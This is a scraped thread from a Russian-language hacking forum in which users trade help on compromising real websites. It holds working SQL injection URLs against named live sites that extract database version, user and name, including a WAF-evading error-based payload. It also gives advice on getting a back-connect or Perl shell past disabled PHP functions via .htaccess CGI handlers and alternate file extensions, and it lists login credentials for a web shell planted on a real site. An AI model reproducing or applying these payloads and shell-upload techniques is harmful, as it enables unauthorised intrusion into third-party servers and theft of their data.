Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    318
    Likes Received:
    110
    Reputations:
    18
    есть веб шелл на сервере с
    Code:
    Disabled PHP Functions: show_source, system, shell_exec, passthru, exec, shell, symlink, popen, proc_open
    можно ли запустить бекконект с таким набором?
     
  2. intNet

    intNet Member

    Joined:
    31 May 2009
    Messages:
    30
    Likes Received:
    14
    Reputations:
    5
    Нашёл SQLInj:
    Code:
    http://strob.od.ua/product.php?pod_kod=60000&id=180+and+1=0+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15
    Code:
    version() 5.0.67-log
    user() strob_admin@127.0.0.1
    database() strob_product
    
    Как теперь можно залить шелл(не через админку)?
    Заранее спасибо, в этой теме 0 почти.
     
  3. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    intNet, вот здесь посмотри:
    https://rdot.org/forum/showthread.php?t=352
     
    2 people like this.
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    728
    Reputations:
    948
    123

    мдя, brutos ну и где там все условия чтоб лить через иньецию?
    нет 2-order inj, mg=on, прав нет у юзверя.

    мб знаете какие то "особые условия" brutos , ноу-хау, поделитесь? :)
    perl-скрипт

    https://forum.antichat.ru/showthread.php?t=198119

    ок

    тут
    тут
    пашкеле медаль. )
     
    #14764 Strilo4ka, 7 Sep 2010
    Last edited: 8 Sep 2010
    1 person likes this.
  5. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Strilo4ka, я его сайт не смотрел. Дал ссылку, где он мог бы подробно, на примерах, прочитать про возможность заливки шелла через sql inj, не более.
     
    #14765 brutos, 7 Sep 2010
    Last edited: 7 Sep 2010
  6. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    318
    Likes Received:
    110
    Reputations:
    18
    Strilo4kaкак я запущу перл скрипт если у меня фунции запуска в пхп отрублены?
     
  7. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    залить perl скрипт (а лучше perl шел), попробовать запустить его через web.

    также нужно попробовать создать .htaccess
    Options +ExecCGI
    AddHandler cgi-script pl

    у меня иногда прокатывало, особенно не на серьезных серверах/хостингах.
     
    1 person likes this.
  8. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Привет, подскажите как узнать имя базы при слепой MS SQL инъекции (выводится только 1 или 0 при верном или не верном запросе)

    И если только брутить то подскажите скрипт или программу для mssql
     
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    очень проблематично найти MaxPatrol.
    может посоветуйте альтернативу ?
    Acunetix Web Vulnerability Scanner 6 - пойдет?
    Просто там каскадное меню и не знаю на сколько правильно "поймет" сканер..
     
  10. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,022
    Likes Received:
    129
    Reputations:
    23
    Спасибо за прогу.
    выбил туда этот сайт. На таблице Request History все время 44:** -200 - 8311 не знаю что это значит.
    снял лог, а там только заголовки на всю страницу:
    Code:
    GET / HTTP/1.1
    Accept:*/*
    User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
    Host:[I]site.aa.su[/I]
    Скажу еще, что сайт попасть можно только лишь после авторизации.
     
    2 people like this.
  11. molotovkeyt

    molotovkeyt Member

    Joined:
    2 Nov 2008
    Messages:
    2
    Likes Received:
    8
    Reputations:
    -1
    http://ru.akella.com/Game.aspx?id=1%27

    че дальше, кто подскажет?
    не имел никогда дело с aspx-движками.
     
    1 person likes this.
  12. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    130
    Likes Received:
    9
    Reputations:
    2
    Всем привет!
    Можно ли с помощью залитого на сайт swf создать/переименовать файл? (без обращения его например к php)
    Надеюсь мой ход мысли понятен!? :)
    ...хотя думается мне, ответ будет отрицательным.
     
  13. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    318
    Likes Received:
    110
    Reputations:
    18
    DrakonHaSh у меня браузер предлагает его сохранить( шеллы и на питоне перле пробовал хренова дело,может кто знает как использовать альтернативные функции?
    IMMORTAL_S swf же в браузере выполняется нечего не сделаешь,ищи другие пути...
     
  14. blackhat

    blackhat New Member

    Joined:
    26 Aug 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Не могу разобраться с шелом, http://morefotok.net/upload/shell.php он читается как обычный текст, логин wall66 пароль 12345
    Думал, что-то с .htaccess замутить-не вышло, не дает создать такой файл. Фильтруется имя файла при закачивании файла+ при переименование тоже выдает ошибку. Кто, что может посоветовать?
     
  15. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Тут нет уязвимости.
     
  16. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    318
    Likes Received:
    110
    Reputations:
    18
    значит он там уже есть,лить в другую папку или .phtml .php3 это поробуй
     
    1 person likes this.
  17. blackhat

    blackhat New Member

    Joined:
    26 Aug 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Shadrin никакого эффекта =(
     
  18. Axel_Ustus

    Axel_Ustus New Member

    Joined:
    4 Jun 2010
    Messages:
    17
    Likes Received:
    4
    Reputations:
    1
    http://www.xvideo.ru/catalog.php?product=588+order+by+1--
    помогите раскрутить инъекцию
    на union select никакой реакции
     
  19. brutos

    brutos Member

    Joined:
    25 Nov 2009
    Messages:
    123
    Likes Received:
    27
    Reputations:
    8
    Axel_Ustus:
    http://www.xvideo.ru/catalog.php?group=7+/*!oR+1+gRoUp+bY+cOnCat((SeLEcT+concat_ws(0x3a,version(),user(),database())),rAnD(0)|0)+hAvInG+miN(0)*/
     
    2 people like this.
  20. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Axel_Ustus:
    Конечно, тебе дали решение задачки, но если тебе вдруг интересно не получение доступа к бд, а причина, по которой не работает union, то ответ таков:

    1) При запросе "order by 2" нам возвращается sql запрос:
    Code:
    select categories_id from t_products_to_categories where product_id = 589 order by 2--
    И мы видим, что запрашивается одно поле
    2) Закроем запрос
    Code:
    http://www.xvideo.ru/catalog.php?product=589 -- 1
    3) Попробуем написать union select после закрытия:
    Code:
    http://www.xvideo.ru/catalog.php?product=589 -- 1 union select 
    Мы видим ошибку, следовательно union select блочится
    4)
    Code:
    http://www.xvideo.ru/catalog.php?product=589 -- 1 union(select 
    Ошибки нет
    5)
    Code:
    http://www.xvideo.ru/catalog.php?product=589 union(select 1) -- 1
    И запрос, который нам вернулся:
    Code:
    select name,description from t_products_items where products_id = 589 union(select 1) -- 1 order by order_id LIMIT 2
    Из этого следует, что тут несколько запросов, и union работать не будет)
     
    8 people like this.
Loading...
Thread Status:
Not open for further replies.